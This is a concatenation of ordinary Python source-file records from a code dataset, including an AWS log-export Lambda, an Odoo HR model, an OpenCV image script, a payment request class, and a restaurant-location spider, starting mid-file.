block.name:\n s_obj2 = block\n total += trajectory(s_obj1,s_obj2)\n elif len(act) == 3:\n for block in blocks_t:\n if act[1] == block.name:\n s_obj1 = block\n if act[2] == block.name:\n s_obj2 = block\n total += trajectory(s_obj1,s_obj2)\n else:\n pass #not implemented yet\n return total\n else:\n logger.error(\"First argument should be either a list or a sceneObject.\")\n return 0\n\nclass sceneObject(object):\n \"\"\"Class for representing objects in environment.\"\"\"\n \n def __init__(self, obj_array, action = None):\n self.handle = int(obj_array[0]) # index\n self.color = _colors[int(obj_array[1])]\n if self.color == 'grey':\n self.color = 'white'\n self.volume = obj_array[2]\n self.x = int(obj_array[3])\n self.y = int(obj_array[4])\n self.z = int(obj_array[5]) # - 20 \n self.r = _rgb[_colors[int(obj_array[1])]][0]\n self.g = _rgb[_colors[int(obj_array[1])]][1]\n self.b = _rgb[_colors[int(obj_array[1])]][2]\n if vision_enabled:\n self.height = obj_array[6] * 1050 - obj_array[8] * 200 # conversion to millimeters\n self.width = obj_array[7] * 800\n self.depth = obj_array[8] * 850\n else:\n self.height = obj_array[6]\n self.width = obj_array[7]\n self.depth = obj_array[8]\n \n found_type = match_object(self)\n if 'block' in found_type:\n self.type = 'block'\n if found_type == 'block1':\n self.shape = 'cubic'\n else:\n self.shape = 'cuboid'\n if self.handle not in colors_b[self.color]:\n colors_b[self.color].append(self.handle)\n self.name = self.color+str(len(colors_b[self.color]))\n elif found_type == 'bottle':\n self.type = 'block'\n self.shape = 'bottle'\n if self.handle not in colors_b[self.color]:\n colors_b[self.color].append(self.handle)\n self.name = self.color+str(len(colors_b[self.color]))\n else:\n self.type = 'oth'\n if found_type == 'box':\n self.shape = 'box'\n elif 'cyl' in found_type:\n self.shape = 'cylinder' # need to change type, 'oth' implies box right now\n else:\n self.shape = 'dummy'\n if self.handle not in colors_box[self.color]:\n colors_box[self.color].append(self.handle)\n self.name = self.color + \"box\" + str(len(colors_box[self.color]))\n if self.shape == 'cylinder':\n self.name = self.name.replace('box','cyl')\n self.z += 100\n\n #other shapes and types not yet implemented\n\n def __str__(self):\n s = indent(\n \"\\nHandle: \" + str(self.handle) + \\\n \"\\nName: \" + str(self.name) + \\\n \"\\nx: \" + str(self.x) + \\\n \"\\ny: \" + str(self.y) + \\\n \"\\nz: \" + str(self.z) + \\\n \"\\nr: \" + str(self.r) + \\\n \"\\ng: \" + str(self.g) + \\\n \"\\nb: \" + str(self.b))\n return s\n \n def return_string(self):\n \"\"\"Returns a string representing the instance of sceneObject.\n This representation is appropriate for constructing the environment\n string, and as such differs from the __str__ representation.\n \"\"\"\n \n return str(self.handle)+'+'+str(self.name)+'+'+\\\n str(self.x)+'+'+str(self.y)+'+'+str(self.z)+'+'+\\\n str(self.r)+'+'+str(self.g)+'+'+str(self.b)+'+'+\\\n self.type+'+'+self.shape\n","sub_path":"IO.py","file_name":"IO.py","file_ext":"py","file_size_in_byte":13306,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"69940028","text":"import boto3\nimport os\nimport time\nfrom datetime import timedelta\nfrom datetime import datetime\n\nlogs = boto3.client('logs')\ngmt_format = '%Y-%m-%dT%H:%M:%S.%fZ'\ndry_run_enabled = os.environ.get('DRY_RUN').lower() in ('true', 'yes', '1')\nexport_bucket = os.environ.get('EXPORT_BUCKET')\n\ndef get_log_groups():\n log_groups = []\n response = logs.describe_log_groups()\n log_groups += response['logGroups']\n while 'nextToken' in response:\n response = logs.describe_log_groups(nextToken=response['nextToken'])\n log_groups += response['logGroups']\n return log_groups\n\ndef export_log_group(log_group, from_time, to_time, label, bucket):\n log_group_name = log_group['logGroupName']\n print( \"Creating export task for \" + log_group_name)\n slash_replace_string=\"__\"\n name_s3_prefix=f\"{os.environ.get('ACCOUNT_ID')}/{log_group_name.replace('/', slash_replace_string)}/{label}\"\n log_streams = logs.describe_log_streams(limit=1, logGroupName=log_group_name, orderBy=\"LastEventTime\", descending=True)['logStreams']\n if len(log_streams) == 0 or 'lastEventTimestamp' not in log_streams[0]:\n print(f\"e_l_g- no streams with messages for logGroup {log_group_name}; Nothing to do\")\n elif int(log_streams[0]['lastEventTimestamp']) < from_time:\n print(f\"e_l_g- no streams with messages since the beginning of yesterday. [{int(log_streams[0]['lastEventTimestamp'])} < {from_time}]; Nothing to do.\")\n else:\n print(f\"e_l_g- Stream exists with message since the beginning of yesterday. [{int(log_streams[0]['lastEventTimestamp'])} > {from_time}]; Let's go!\")\n # Create the export task\n if dry_run_enabled:\n print(\"e_l_g- Dry Run Enabled, skipping create task\")\n else:\n response = {\"taskId\": \"WARNING: NEVER STARTED\"}\n try:\n print(f\"e_l_g- Running logGroupName={log_group_name} taskName={log_group_name}-{label} destination={bucket} destinationPrefix={name_s3_prefix}\")\n response = logs.create_export_task( logGroupName=log_group_name, taskName=f\"{log_group_name}-{label}\", fromTime=from_time, to=to_time, destination=bucket, destinationPrefix=name_s3_prefix)\n except logs.exceptions.LimitExceededException:\n print( \"AWS wouldn't let us create a new export task, even though they said there's no task running. Waiting one more time and retrying...\" )\n wait_for_completion(5)\n response = logs.create_export_task( logGroupName=log_group_name, taskName=f\"{log_group_name}-{label}\", fromTime=from_time, to=to_time, destination=bucket, destinationPrefix=name_s3_prefix)\n print( f\"export_log_group - Got a taskId {response['taskId']}\" )\ndef wait_for_completion(presleep=0):\n time.sleep(presleep)\n while (len(logs.describe_export_tasks(statusCode=\"PENDING\")['exportTasks']) + len(logs.describe_export_tasks(statusCode=\"RUNNING\")['exportTasks']) ) > 0:\n print(\"wait_for_completion - Waiting for previous export task to finish...\")\n time.sleep(1)\n print(\"wait_for_completion - No RUNNING or PENDING export tasks\")\ndef lambda_handler(event, context):\n if dry_run_enabled:\n print('~' * 60)\n print(\"DryRun: Enabled\")\n print(\"When dry run mode is enabled the SDK request are validated but no actions are transmitted\")\n print('~' * 60)\n # Get start/end time for logs\n now=datetime.now()\n today=datetime(year=now.year, month=now.month, day=now.day)\n yesterday=today - timedelta(days=1)\n epoch=datetime(year=1970,month=1,day=1)\n epoch_yesterday=yesterday-epoch\n epoch_today=today-epoch\n from_time=int(epoch_yesterday.total_seconds()*1000)\n to_time=int(epoch_today.total_seconds()*1000 - 1)\n label=f'{yesterday.year}-{yesterday.month}-{yesterday.day}'\n log_groups = get_log_groups()\n for log_group in log_groups:\n wait_for_completion()\n export_log_group(from_time=from_time, to_time=to_time, label=label, bucket=export_bucket, log_group=log_group)\n","sub_path":"terraform/account/lambdas/sba-security-logexport/index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":3844,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"285951700","text":"from rest_framework.response import Response\nfrom rest_framework.views import APIView\n\nfrom usaspending_api.spending_explorer.v2.filters.type_filter import type_filter\n\n\nclass SpendingExplorerViewSet(APIView):\n\n def post(self, request):\n\n json_request = request.data\n _type = json_request.get('type')\n filters = json_request.get('filters', None)\n\n # Returned filtered queryset results\n results = type_filter(_type, filters)\n\n return Response(results)\n","sub_path":"usaspending_api/spending_explorer/v2/views/spending_explorer.py","file_name":"spending_explorer.py","file_ext":"py","file_size_in_byte":496,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"612729982","text":"# -*- coding: utf-8 -*-\nfrom odoo import models, fields, _, api\nfrom odoo.exceptions import Warning\n\n\n# Ahmed Salama Code Start ---->\n\n\nclass HrPromotion(models.Model):\n\t_name = 'hr.promotion'\n\t_description = \"HR Employee Transfer\"\n\t_inherit = ['mail.thread', 'image.mixin']\n\t\n\tdate = fields.Date(\"Date\", default=fields.Date.today(),\n\t\t\t\t\t readonly=True, states={'draft': [('readonly', False)]})\n\tname = fields.Char(\"Decision No.\",\n\t\t\t\t\t readonly=True, states={'draft': [('readonly', False)]})\n\tstate = fields.Selection([('draft', 'Draft'), ('confirm', 'Confirmed'), ('done', 'Done')\n\t\t , ('cancel', 'Cancelled')], default='draft', string=\"Stage\",\n\t track_visibility='onchange')\n\tline_ids = fields.One2many('hr.promotion.line', 'action_id', \"Lines\",\n\t\t\t\t\t\t\t track_visibility='onchange', readonly=True, states={'draft': [('readonly', False)]})\n\t\n\tdef action_confirm(self):\n\t\tmessages = ''\n\t\tfor line in self.line_ids:\n\t\t\tif line.new_level_id and line.level_id != line.new_level_id:\n\t\t\t\tmessages += \"- Employee [%s] Level [%s] updated to [%s] \" % \\\n\t\t\t\t (line.employee_id.name, line.level_id.name, line.new_level_id.name)\n\t\t\t\tline.old_level_id = line.level_id and line.level_id.id or False\n\t\t\t\tline.employee_id.write({'level_id': line.new_level_id.id, 'level_date': self.date})\n\t\tif len(messages):\n\t\t\tself.message_post(body=messages)\n\t\tself.write({'state': 'confirm'})\n\n\t\n\tdef action_cancel(self):\n\t\tself.write({'state': 'cancel'})\n\t\n\tdef action_reset(self):\n\t\tself.write({'state': 'draft'})\n\t\n\tdef action_print_report(self):\n\t\treturn self.env.ref('egymentors_hr.hr_employee_promotion_report').report_action(self)\n\t\t\n\tdef unlink(self):\n\t\tfor rec in self:\n\t\t\tif rec.state == 'confirm':\n\t\t\t\traise Warning(_(\"You can't delete confirmed records!!!\"))\n\t\treturn super(HrPromotion, self).unlink()\n\n\nclass HrEmployeeActionLine(models.Model):\n\t_name = 'hr.promotion.line'\n\t_rec_name = 'action_id'\n\t\n\taction_id = fields.Many2one('hr.promotion', \"Action\")\n\tstate = fields.Selection(related='action_id.state')\n\temployee_id = fields.Many2one('hr.employee', \"Employee\", required=True)\n\t\n\t@api.onchange('employee_id')\n\t@api.depends('employee_id.level_date')\n\tdef _get_level_date(self):\n\t\tfor line in self:\n\t\t\tif line.employee_id:\n\t\t\t\tline.level_date = line.employee_id.level_date\n\t\t\t\t\n\t@api.model\n\tdef create(self, vals):\n\t\tif vals.get('employee_id'):\n\t\t\temp_id = self.env['hr.employee'].browse(vals.get('employee_id'))\n\t\t\tif emp_id and emp_id.level_date:\n\t\t\t\tvals['level_date'] = emp_id.level_date\n\t\treturn super(HrEmployeeActionLine, self).create(vals)\n\t\n\tdef write(self, vals):\n\t\tif vals.get('employee_id'):\n\t\t\temp_id = self.env['hr.employee'].browse(vals.get('employee_id'))\n\t\t\tif emp_id and emp_id.level_date:\n\t\t\t\tvals['level_date'] = emp_id.level_date\n\t\treturn super(HrEmployeeActionLine, self).write(vals)\n\t\t\n\tlevel_date = fields.Date(\"Current Level Date\")\n\tlevel_id = fields.Many2one(related='employee_id.level_id', string=\"Current Level\", track_visibility='onchange')\n\told_level_id = fields.Many2one('hr.level', \"Old Level\")\n\tnew_level_id = fields.Many2one('hr.level', \"New Level\")\n\n\n# Ahmed Salama Code End.\n","sub_path":"egymentors_hr/models/hr_promotion.py","file_name":"hr_promotion.py","file_ext":"py","file_size_in_byte":3171,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"513009903","text":"import numpy as np\nfrom matplotlib import pyplot as plt\nimport cv2 as cv\nimport sys\n\ndef get_corners(image):\n raw_image = cv.cvtColor(image, cv.COLOR_BGR2GRAY)\n\n # Numpy show rows, cols but, annoyingly, findContours\n # and OpenCV in general uses cols, rows. That's the \n # reason for the next two lines.\n rows, cols = raw_image.shape\n canvas_corners = [(0, 0), (cols, 0), (0, rows), (cols, rows)]\n corners = []\n\n blur_v = int(rows / 720) * 33\n blur_v = blur_v if blur_v % 2 else blur_v + 1\n md_blur = cv.medianBlur(raw_image, blur_v)\n\n show(md_blur)\n\n thresh = cv.adaptiveThreshold(md_blur, 255, cv.ADAPTIVE_THRESH_MEAN_C, cv.THRESH_BINARY_INV, 11, 2)\n\n show(thresh)\n\n _, contours, _ = cv.findContours(thresh, cv.RETR_EXTERNAL, cv.CHAIN_APPROX_SIMPLE)\n\n if contours:\n CAM_SIZE = (cols, rows)\n\n center = (CAM_SIZE[0]/2, CAM_SIZE[1]/2)\n limit = (95, 95)\n\n lims = [(center[0] - limit[0]*CAM_SIZE[0]/100/2, limit[0]*CAM_SIZE[0]/100/2 + center[0]), \\\n (center[1] - limit[1]*CAM_SIZE[1]/100/2, limit[1]*CAM_SIZE[1]/100/2 + center[1])]\n\n rect_contours = []\n for cnt in contours:\n avg = np.average(cnt, axis=0)[0]\n if (lims[0][0] < avg[0] < lims[0][1]) and (lims[1][0] < avg[1] < lims[1][1]):\n rect_contours.append(cnt)\n \n #rect = max(contours, key=lambda x: len(x))\n rect = np.concatenate(rect_contours)\n\n for i in range(4):\n np_corner = min(rect, key=lambda x: \\\n np.sqrt((canvas_corners[i][0]-x[0][0])**2 +\\\n (canvas_corners[i][1]-x[0][1])**2))[0]\n corner = (np_corner[0], np_corner[1])\n corners.append(corner)\n\n return corners\n\ndef draw_corners(image, corners):\n copy = np.copy(image)\n\n factor = int(copy.shape[0] / 720)\n radius = factor * 10\n thick = factor * 4\n\n for corner in corners:\n cv.circle(copy, corner, radius, (0, 0, 255), thick)\n \n return copy\n\ndef main(arg):\n rawim = cv.imread(arg)\n corners = get_corners(rawim)\n img = draw_corners(rawim, corners)\n show(img)\n\n img = warp_image(rawim, corners, (640, 480))\n img = equalize_image(img)\n\n #cv.imwrite('res.jpg', img)\n\n show(img)\n\ndef warp_image(raw_image, corners, canvas):\n image = cv.cvtColor(raw_image, cv.COLOR_BGR2GRAY)\n\n _, t_r, b_l, b_r = corners\n cols = t_r[0] if t_r[0] > b_r[0] else b_r[0]\n rows = b_l[1] if b_l[1] > b_r[1] else b_r[1]\n canvas = [(0, 0), (cols, 0), (0, rows), (cols, rows)]\n\n warper = cv.getPerspectiveTransform(np.float32(corners), np.float32(canvas))\n warped = cv.warpPerspective(image, warper, canvas[3])\n\n image = cv.cvtColor(warped, cv.COLOR_GRAY2BGR)\n\n return image\n\ndef equalize_image(raw_image):\n image = cv.cvtColor(raw_image, cv.COLOR_BGR2GRAY)\n\n tile_size = int(raw_image.shape[0] * 0.1)\n clahe = cv.createCLAHE(clipLimit=10, tileGridSize=(tile_size,tile_size))\n equalized = clahe.apply(image)\n\n contrast = cv.multiply(equalized, 1.25)\n\n blur = cv.medianBlur(contrast, 3)\n _, thresh = cv.threshold(blur, 150, 255, cv.THRESH_TOZERO)\n\n image = cv.cvtColor(thresh, cv.COLOR_GRAY2BGR)\n\n return image\n\ndef odd(num):\n return num if num % 2 else num + 1\n\n\n\ndef show(image):\n im = cv.resize(image,(800, 480),fx=0, fy=0, interpolation=cv.INTER_AREA)\n cv.imshow('image', im)\n\n while True:\n key = cv.waitKey(1) & 0xFF\n if key == ord('q'):\n return\n\nif __name__ == '__main__': main(sys.argv[1])\n","sub_path":"rough/snaps.py","file_name":"snaps.py","file_ext":"py","file_size_in_byte":3638,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"470417779","text":"from yandex_checkout.domain.common.request_object import RequestObject\nfrom yandex_checkout.domain.models.airline import Airline\nfrom yandex_checkout.domain.models.amount import Amount\nfrom yandex_checkout.domain.models.confirmation.confirmation import Confirmation\nfrom yandex_checkout.domain.models.confirmation.confirmation_factory import ConfirmationFactory\nfrom yandex_checkout.domain.models.payment_data.payment_data import PaymentData\nfrom yandex_checkout.domain.models.payment_data.payment_data_factory import PaymentDataFactory\nfrom yandex_checkout.domain.models.receipt import Receipt\nfrom yandex_checkout.domain.models.recipient import Recipient\n\n\nclass PaymentRequest(RequestObject):\n __recipient = None\n\n __amount = None\n\n __description = None\n\n __receipt = None\n\n __payment_token = None\n\n __payment_method_id = None\n\n __payment_method_data = None\n\n __confirmation = None\n\n __save_payment_method = None\n\n __capture = None\n\n __client_ip = None\n\n __airline = None\n\n __metadata = None\n\n @property\n def recipient(self):\n return self.__recipient\n\n @recipient.setter\n def recipient(self, value):\n if isinstance(value, dict):\n self.__recipient = Recipient(value)\n elif isinstance(value, Recipient):\n self.__recipient = value\n else:\n raise TypeError('Invalid recipient value type')\n\n @property\n def amount(self):\n return self.__amount\n\n @amount.setter\n def amount(self, value):\n if isinstance(value, dict):\n self.__amount = Amount(value)\n elif isinstance(value, Amount):\n self.__amount = value\n else:\n raise TypeError('Invalid amount value type')\n\n @property\n def description(self):\n return self.__description\n\n @description.setter\n def description(self, value):\n cast_value = str(value)\n if cast_value and len(cast_value) <= 128:\n self.__description = cast_value\n else:\n raise ValueError('Invalid description value')\n\n @property\n def receipt(self):\n return self.__receipt\n\n @receipt.setter\n def receipt(self, value):\n if isinstance(value, dict):\n self.__receipt = Receipt(value)\n elif isinstance(value, Receipt):\n self.__receipt = value\n else:\n raise TypeError('Invalid receipt value type')\n\n @property\n def payment_token(self):\n return self.__payment_token\n\n @payment_token.setter\n def payment_token(self, value):\n cast_value = str(value)\n if cast_value:\n self.__payment_token = cast_value\n else:\n raise ValueError('Invalid payment_token value')\n\n @property\n def payment_method_id(self):\n return self.__payment_method_id\n\n @payment_method_id.setter\n def payment_method_id(self, value):\n cast_value = str(value)\n if cast_value:\n self.__payment_method_id = cast_value\n\n @property\n def payment_method_data(self):\n return self.__payment_method_data\n\n @payment_method_data.setter\n def payment_method_data(self, value):\n if isinstance(value, dict):\n self.__payment_method_data = PaymentDataFactory().create(value, self.context())\n elif isinstance(value, PaymentData):\n self.__payment_method_data = value\n else:\n raise TypeError('Invalid payment_method_data type')\n\n @property\n def confirmation(self):\n return self.__confirmation\n\n @confirmation.setter\n def confirmation(self, value):\n if isinstance(value, dict):\n self.__confirmation = ConfirmationFactory().create(value, self.context())\n elif isinstance(value, Confirmation):\n self.__confirmation = value\n else:\n raise TypeError('Invalid confirmation type')\n\n @property\n def save_payment_method(self):\n return self.__save_payment_method\n\n @save_payment_method.setter\n def save_payment_method(self, value):\n self.__save_payment_method = bool(value)\n\n @property\n def capture(self):\n return self.__capture\n\n @capture.setter\n def capture(self, value):\n self.__capture = bool(value)\n\n @property\n def client_ip(self):\n return self.__client_ip\n\n @client_ip.setter\n def client_ip(self, value):\n self.__client_ip = str(value)\n\n @property\n def airline(self):\n return self.__airline\n\n @airline.setter\n def airline(self, value):\n if isinstance(value, dict):\n self.__airline = Airline(value)\n elif isinstance(value, Airline):\n self.__airline = value\n else:\n raise TypeError('Invalid airline type')\n\n @property\n def metadata(self):\n return self.__metadata\n\n @metadata.setter\n def metadata(self, value):\n if type(value) is dict:\n self.__metadata = value\n\n def validate(self):\n amount = self.amount\n if amount is None:\n self.__set_validation_error('Payment amount not specified')\n\n if amount.value <= 0.0:\n self.__set_validation_error('Invalid payment amount value: ' + str(amount.value))\n\n if self.receipt is not None and self.receipt.has_items:\n email = self.receipt.email\n phone = self.receipt.phone\n if not email and not phone:\n self.__set_validation_error('Both email and phone values are empty in receipt')\n\n if self.receipt.tax_system_code is None:\n for item in self.receipt.items:\n if item.vat_code is None:\n self.__set_validation_error('Item vat_code and receipt tax_system_id not specified')\n\n if self.payment_token:\n if self.payment_method_id:\n self.__set_validation_error('Both payment_token and payment_method_id values are specified')\n\n if self.payment_method_data:\n self.__set_validation_error('Both payment_token and payment_data values are specified')\n\n elif self.payment_method_id:\n if self.payment_method_data:\n self.__set_validation_error('Both payment_method_id and payment_data values are specified')\n\n def __set_validation_error(self, message):\n raise ValueError(message)\n","sub_path":"yandex_checkout/domain/request/payment_request.py","file_name":"payment_request.py","file_ext":"py","file_size_in_byte":6362,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"209794246","text":"from Gaudi.Configuration import *\n\n###### Parser ################\n\nimport argparse\nparser = argparse.ArgumentParser()\nparser.add_argument('--input', type=str, default=None, help='specify an input File')\nmy_args, _ = parser.parse_known_args()\n\nfrom FWCore.joboptions import parse_standard_job_options\nargs = parse_standard_job_options()\n\n\"\"\"\nmy_input = \"simu_test.root\"\noutfilename = \"reco_test.root\"\n\"\"\"\n\nif args.outputfile is not None:\n outfilename = args.outputfile\n\nif my_args.input != None:\n my_input = my_args.input\n\n################################\n\n#my_input = \"simu_test.root\"\n#outfilename = \"reco_100eV_DCA8mm.root\"\n\"\"\"\nmy_input =\"/eos/user/n/nali/Hadrons/HadZ.root\"\noutfilename = \"/eos/user/n/nali/Hadrons/Analysis_HadZ.root\"\n\n\nmy_input =\"/eos/user/n/nali/SR/SR.root\"\noutfilename = \"/eos/user/n/nali/SR/Analysis_SR.root\"\n\"\"\"\n\"\"\"\nmy_input = \"fccee_fullsim_pgun_2T_1MeV.root\"\noutfilename = \"mergedHits_2T_1MeV.root\"\n\"\"\"\n\n\"\"\"\nset_energy = 2400\nmy_input = \"SimuOutput/pgun/\"+str(set_energy)+\"MeV_theta90.root\"\noutfilename = \"SimuOutput/pgun/reco_\"+str(set_energy)+\"MeV_theta90.root\"\n\"\"\"\n\nmy_input = \"SimuOutput/pythia/simu_Zdd.root\"\noutfilename = \"SimuOutput/pythia/reco_simu_Zdd.root\"\n\nfrom GaudiKernel.SystemOfUnits import eV\nfrom Configurables import ApplicationMgr, FCCDataSvc, PodioOutput\n\npodioevent = FCCDataSvc(\"EventDataSvc\", input=my_input)\n\n\n\nfrom Configurables import PodioInput, ReadTestConsumer\npodioinput = PodioInput(\"PodioReader\", collections=[\"positionedHits_DCH\"], OutputLevel=DEBUG)\n#checker = ReadTestConsumer()\n\n\n# DD4hep geometry service\n# Parses the given xml file\nfrom Configurables import GeoSvc\ngeoservice = GeoSvc(\"GeoSvc\", detectors=['Detector/DetFCCeeIDEA/compact/FCCee_DectEmptyMaster.xml',\n 'Detector/DetFCCeeIDEA/compact/DriftChamber.xml'], \n OutputLevel = DEBUG)\n\nfrom Configurables import CreateDCHHits\ncreatehits = CreateDCHHits(\"CreateDCHHits\",\n readoutName = \"DriftChamberCollection\",\n outFileName=outfilename,\n EdepCut = 100*1e-9,\n DCACut = 0.8,\n OutputLevel=DEBUG)\n\ncreatehits.positionedHits.Path = \"positionedHits_DCH\"\ncreatehits.mergedHits.Path = \"merged_DCH\"\n\n\nApplicationMgr( TopAlg = [podioinput, \n createhits, \n ],\n EvtSel = 'NONE',\n EvtMax = -1,\n # order is important, as GeoSvc is needed by SimG4Svc\n ExtSvc = [podioevent, \n geoservice\n ],\n OutputLevel = DEBUG\n )\n\n\n","sub_path":"Reconstruction/RecDriftChamber/tests/options/mergeHits.py","file_name":"mergeHits.py","file_ext":"py","file_size_in_byte":2694,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"303899765","text":"#-*- encoding: utf-8 -*-\n\nimport pprint #imprimir conteudo de dicionário de uma forma mais limpa\n\nnotas = {\n\t\"Graham Chapman\": 5.5,\n\t\"John Cleese\": 7.0,\n\t\"Terry Gilliam\": 4.5,\n\t\"Terry Jone\": 4.5,\n\t\"Eric Idle\": 10,\n\t\"Michael Palin\": 3.5,\n}\n# -20 e -7 dar um espaçamento, um alinhamento a esquerda\nprint(\"%-20s--+-%-7s\") % (\"-\" * 20,\"-\" * 7)\nprint(\"%-20s | %-7s\") % (\"Nome\", \"Nota\")\nprint(\"%-20s--+-%-7s\") % (\"-\" * 20,\"-\" * 7) #Faz o tracejado no cabeçalho\nsoma = 0\ncount = 0\nfor nome in sorted(notas):\n\tprint (\"%-20s | %4.1f\") % (nome, notas[nome])\n\tsoma += notas[nome]\n\tcount += 1\nprint(\"%-20s--+-%-7s\") % (\"-\" * 20,\"-\" * 7)\nprint (u\"%-20s | %4.1f\") % (u\"Média\", soma/count)","sub_path":"teste.py","file_name":"teste.py","file_ext":"py","file_size_in_byte":681,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
+{"seq_id":"94965293","text":"#!/usr/bin/env runaiida\n# -*- coding: utf-8 -*-\n\n#\n# An example of Workchain to perform geometry relaxation\n# Note: The current input structure is non-optimal, in the\n# sense that the structure is pulled from the database, while\n# the parameters are set here. For example, the parameters are\n# taken from the 'test_siesta_geom_fail.py' legacy test, which\n# is for a water molecule.\n#\nfrom __future__ import absolute_import\nfrom __future__ import print_function\nimport argparse\nfrom aiida.orm import Str, Float, StructureData\nfrom aiida.orm.utils import load_code, load_node\nfrom aiida.engine.launch import run\n\nfrom aiida_siesta.workflows.stm import SiestaSTMWorkChain\n\n\ndef parser_setup():\n \"\"\"\n Setup the parser of command line arguments and return it. This is separated from the main\n execution body to allow tests to effectively mock the setup of the parser and the command line arguments\n \"\"\"\n parser = argparse.ArgumentParser(\n description='Run the SiestaSTMWorkChain for a given input structure', )\n parser.add_argument(\n '-c',\n type=str,\n required=True,\n dest='codename',\n help='the name of the AiiDA code that references Siesta.siesta plugin')\n parser.add_argument(\n '-t',\n type=str,\n required=True,\n dest='stm_codename',\n help='the name of the AiiDA code that references Siesta.stm plugin')\n parser.add_argument('-p',\n type=str,\n required=False,\n dest='protocol',\n default='standard',\n help='the protocol (default: %(default)s)')\n parser.add_argument('-s',\n type=int,\n required=False,\n dest='structure',\n default=0,\n help='the node id of the structure')\n parser.add_argument(\n '-z',\n type=float,\n required=False,\n dest='height',\n default=7.5,\n help='the height (in Ang) at which to compute the image')\n parser.add_argument('-e',\n type=float,\n required=False,\n dest='e1',\n default=-5.0,\n help='the lower limit of the energy window')\n parser.add_argument('-E',\n type=float,\n required=False,\n dest='e2',\n default=1.0,\n help='the upper limit of the energy window')\n\n return parser\n\n\ndef execute(args):\n \"\"\"\n The main execution of the script, which will run some preliminary checks on the command\n line arguments before passing them to the workchain and running it\n \"\"\"\n code = load_code(args.codename)\n stm_code = load_code(args.stm_codename)\n height = Float(args.height)\n e1 = Float(args.e1)\n e2 = Float(args.e2)\n\n protocol = Str(args.protocol)\n\n alat = 15. # angstrom\n cell = [\n [\n alat,\n 0.,\n 0.,\n ],\n [\n 0.,\n alat,\n 0.,\n ],\n [\n 0.,\n 0.,\n alat,\n ],\n ]\n\n # Benzene molecule\n #\n s = StructureData(cell=cell)\n\n def perm(x, y, z):\n return (z, y + 0.5 * alat, x + 0.5 * alat)\n\n s.append_atom(position=perm(0.000, 0.000, 0.468), symbols=['H'])\n s.append_atom(position=perm(0.000, 0.000, 1.620), symbols=['C'])\n s.append_atom(position=perm(0.000, -2.233, 1.754), symbols=['H'])\n s.append_atom(position=perm(0.000, 2.233, 1.754), symbols=['H'])\n s.append_atom(position=perm(0.000, -1.225, 2.327), symbols=['C'])\n s.append_atom(position=perm(0.000, 1.225, 2.327), symbols=['C'])\n s.append_atom(position=perm(0.000, -1.225, 3.737), symbols=['C'])\n s.append_atom(position=perm(0.000, 1.225, 3.737), symbols=['C'])\n s.append_atom(position=perm(0.000, -2.233, 4.311), symbols=['H'])\n s.append_atom(position=perm(0.000, 2.233, 4.311), symbols=['H'])\n s.append_atom(position=perm(0.000, 0.000, 4.442), symbols=['C'])\n s.append_atom(position=perm(0.000, 0.000, 5.604), symbols=['H'])\n\n if args.structure > 0:\n structure = load_node(args.structure)\n else:\n structure = s\n\n run(SiestaSTMWorkChain,\n code=code,\n stm_code=stm_code,\n structure=structure,\n protocol=protocol,\n height=height,\n e1=e1,\n e2=e2)\n\n\ndef main():\n \"\"\"\n Setup the parser to retrieve the command line arguments and pass them to the main execution function.\n \"\"\"\n parser = parser_setup()\n args = parser.parse_args()\n execute(args)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"aiida_siesta/examples/workflows/test_stm_wk.py","file_name":"test_stm_wk.py","file_ext":"py","file_size_in_byte":4774,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"374266067","text":"import json\nimport re\n\nimport scrapy\n\nfrom locations.items import Feature\n\n\nclass TheBurgersPriestSpider(scrapy.Spider):\n name = \"the_burgers_priest\"\n item_attributes = {\"brand\": \"The Burger's Priest\", \"brand_wikidata\": \"Q100255453\"}\n allowed_domains = [\"theburgerspriest.com\"]\n start_urls = [\n \"https://theburgerspriest.com/find-a-location/\",\n ]\n\n def parse(self, response):\n data = response.xpath('//script[contains(text(),\"locations\")]/text()').extract_first()\n\n ## Fix lots of formatting issues\n json_data = re.sub(r\"var images\\s=\\s((?s).*?)var locations = \", \"\", data)\n json_data = re.sub(r'\"photo\"\\s:\\s((?s).*?),', \"\", json_data)\n json_data = re.sub(r'\"hours\"\\s:\\s((?s).*?)],', '\"hours\" : []', json_data)\n json_data = re.sub(r'\"description\"\\s:\\s((?s).*?)\",', \"\", json_data)\n json_data = json_data.replace(\";\", \"\")\n json_data = json_data[:-12]\n json_data = json_data + \"]}\"\n\n places = json.loads(json_data)\n\n for place in places[\"features\"]:\n try:\n ref = re.search(r\".com\\/(.*)\", place[\"properties\"][\"url\"]).groups()[0]\n except:\n ref = place[\"properties\"][\"name\"]\n\n properties = {\n \"ref\": ref,\n \"name\": place[\"properties\"][\"name\"],\n \"addr_full\": place[\"properties\"][\"address\"],\n \"city\": place[\"properties\"][\"city\"],\n \"state\": place[\"properties\"][\"provShort\"],\n \"country\": \"CA\",\n \"lat\": place[\"geometry\"][\"coordinates\"][1],\n \"lon\": place[\"geometry\"][\"coordinates\"][0],\n \"phone\": place[\"properties\"][\"phone\"],\n \"website\": place[\"properties\"][\"url\"],\n }\n\n yield Feature(**properties)\n","sub_path":"locations/spiders/the_burgers_priest.py","file_name":"the_burgers_priest.py","file_ext":"py","file_size_in_byte":1823,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
